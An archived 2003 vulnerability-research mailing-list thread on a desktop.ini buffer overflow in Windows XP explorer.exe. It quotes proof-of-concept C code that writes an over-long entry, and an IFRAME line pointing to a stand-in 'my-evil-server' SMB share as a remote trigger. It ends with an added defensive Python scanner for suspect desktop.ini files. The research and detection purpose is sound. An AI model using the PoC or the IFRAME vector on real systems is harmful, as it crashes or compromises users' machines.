Re: Buffer overflow in Explorer.exe
From: Kris Matthews (krism at mailsnare.net)
Date: Sun May 11 2003 - 15:39:24 CDT
I have been unable to reproduce it in this fashion; my quick-and-dirty
guess is that explorer.exe does not attempt to interpret that file for
remote (smb/etc) shares.
However, if you do it from a _local_ share.... It still blows up quite
nicely. :)
Regards,
Kristopher
On Sun, 2003-05-11 at 13:55, Berend-Jan Wever wrote:
> Could this not be done remotely without user interaction except browsing an
> evil website by using SMB ?
> <HTML><BODY>
> <IFRAME src="\\my-evil-server\">
> </BODY></HTML>
> You can make IE browse a hard disk whose contents you control...
>
> I don't have XP so I can't test this. Let me know what you find.
>
> Cheers,
>
> Berend-Jan Wever
>
> ----- Original Message -----
> From: "Kristopher Matthews" <krism at mailsnare.net>
> To: "'Ryan Yagatich'" <ryany at pantek.com>
> Cc: <vuln-dev at securityfocus.com>
> Sent: Friday, May 09, 2003 18:42
> Subject: RE: Buffer overflow in Explorer.exe
>
>
> I have tested and duplicated this behavior on a fully patched/updated
> Windows XP Pro system.
>
> 1. The overflow is for that particular key, AFAICT.
> 1a. It will not work for the root (c:/) directory; explorer.exe does not
> parse 'desktop.ini' for that directory. It will, however, work for any other
> directory.
> 2. It crashes explorer.exe (which runs the task bar/start menu, etc) - It
> looks for all the world like a standard buffer overflow; I believe a more
> carefully crafted 'desktop.ini' file could cause explorer.exe to
> unintentionally execute arbitrary code.
> 3. Download and execute untrusted code? Combine this with any of the other
> popular exploits for windows; also, it wouldn't be terribly hard to get a
> user to download a 'desktop.ini' file to their "My Documents" directory (in
> the guise of, say, a folder theme, which windows does support; e.g.
> different background, file layout, etc); bam, whenever they open that
> directory, explorer crashes.
>
> Regards,
> Kristopher
>
>
> -----Original Message-----
> From: Ryan Yagatich [mailto:ryany at pantek.com]
> Sent: Thursday, May 08, 2003 6:28 PM
> To: at4r at 3wdesign.es
> Cc: vuln-dev at securityfocus.com
>
> Hi,
> I don't quite understand the purpose behind this code. It creates
> a read only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the
> contents of
>
> [.ShellClassInfo]
> AAAAAAAAAAAA {x2301}
>
>
> And then terminates? I don't have a windows machine available to
> really explore this any, but what makes that entry in desktop.ini cause
> this? Furthermore, is this issue only for that particular key or is it
> generally just key/excessive parameter/missing value size that is
> affected? And additionally, you mention that explorer will no longer be
> able to operate when trying to browse the hard disk, but does this mean
> globally, or when they try to browse the c:/ drive, or just that
> particular folder?
> Please send me more information about this, (even if it references
> past posts that I have missed) so that I can better understand the
> severity of this. Especially since to me, I still see it as someone needing
> to download and execute untrusted software which causes a system crash,
> and if that were going to happen there are far worse things that can be
> done besides creating a small text file.
>
> Thanks,
> Ryan Yagatich
>
>
> ,_____________________________________________________,
> \ Ryan Yagatich support at pantek.com \
> / Pantek Incorporated (877) LINUX-FIX /
> \ http://www.pantek.com/security (440) 519-1802 \
> / Are your networks secure? Are you certain? /
> \___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\
>
> On Wed, 7 May 2003, aT4r InsaN3 wrote:
>
> >This bug allows a malicious attacker to execute data with privileges of a
> >user that is browsing the hard disk with explorer.
> >
> >tested against winxp SP1
> >
> >example code provided.
> >
> <snip>
> >
> > strcpy(path,"\\aT4r[at]3WDesign.es Security");
> > mkdir(path);
> > SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
> >
> > strcat(path,"\\desktop.ini");
> > bof=fopen(path,"w");
> > fputs("[.ShellClassInfo]\n",bof);
> > memset(evil,'A',BUFF);
> > fputs(evil,bof);
> > fclose(bof);
> <snip>
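Ryan's question about whether the crash is tied to that particular key or to any over-long entry is, from the defender's side, a question of what to look for on disk. The following is an added example, not code from the thread or from any of its authors: a small Python scanner that walks a directory tree, reads every desktop.ini it finds, and flags entries in any section that either lack a key=value separator or exceed a length threshold. MAX_ENTRY_LEN is an assumed value chosen for illustration, not a documented explorer.exe limit, and the sample contents are constructed for the test rather than taken from the thread's files.

```python
import sys
from pathlib import Path

# Assumed threshold for an over-long entry; chosen for this example and not a
# documented limit of explorer.exe. The PoC quoted in the thread writes a run
# of 'A' bytes far longer than any legitimate desktop.ini entry.
MAX_ENTRY_LEN = 256


def scan_desktop_ini_text(text):
    """Return a list of (line_no, section, reason) findings for one file body.

    Two heuristics taken from the thread are applied to every entry line:
      - an entry with no '=' (the PoC writes a bare run of bytes, not key=value)
      - an entry longer than MAX_ENTRY_LEN bytes
    """
    findings = []
    section = None
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue                      # blank line or INI comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]          # e.g. ".ShellClassInfo"
            continue
        if "=" not in line:
            findings.append((line_no, section, "entry without '=' separator"))
        if len(line) > MAX_ENTRY_LEN:
            findings.append((line_no, section,
                             f"entry longer than {MAX_ENTRY_LEN} bytes"))
    return findings


def scan_tree(root):
    """Walk a tree and return {path: findings} for every suspect desktop.ini."""
    results = {}
    for path in Path(root).rglob("desktop.ini"):
        try:
            # desktop.ini is plain 8-bit text; decode leniently so a binary
            # payload in one file does not abort the whole scan.
            text = path.read_text(encoding="latin-1")
        except OSError:
            continue
        found = scan_desktop_ini_text(text)
        if found:
            results[str(path)] = found
    return results


# Constructed sample contents (not files from the thread) used as test input.
BENIGN_SAMPLE = "[.ShellClassInfo]\nIconFile=folder.ico\nIconIndex=0\n"
SUSPECT_SAMPLE = "[.ShellClassInfo]\n" + "A" * 2048 + "\n"


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for file_path, found in scan_tree(root).items():
        for line_no, section, reason in found:
            print(f"{file_path}:{line_no} [{section}] {reason}")
```

Run it against a user profile or a share (for example `python scan_desktop_ini.py "C:\Users"`, script name assumed). A hit on an entry in [.ShellClassInfo] with no '=' is exactly the shape of the PoC quoted above; a hit in another section is the data point Ryan asked for on whether the behaviour is specific to that key.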